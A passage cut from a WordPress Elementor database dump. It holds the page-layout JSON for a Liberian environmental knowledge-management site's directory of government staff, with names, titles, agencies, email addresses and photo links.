\\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8ed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23986,3514,'_elementor_edit_mode','builder'),(23987,3514,'_elementor_template_type','wp-page'),(23988,3514,'_elementor_version','3.0.16'),(23989,3514,'_wp_page_template','default'),(23990,3514,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"sect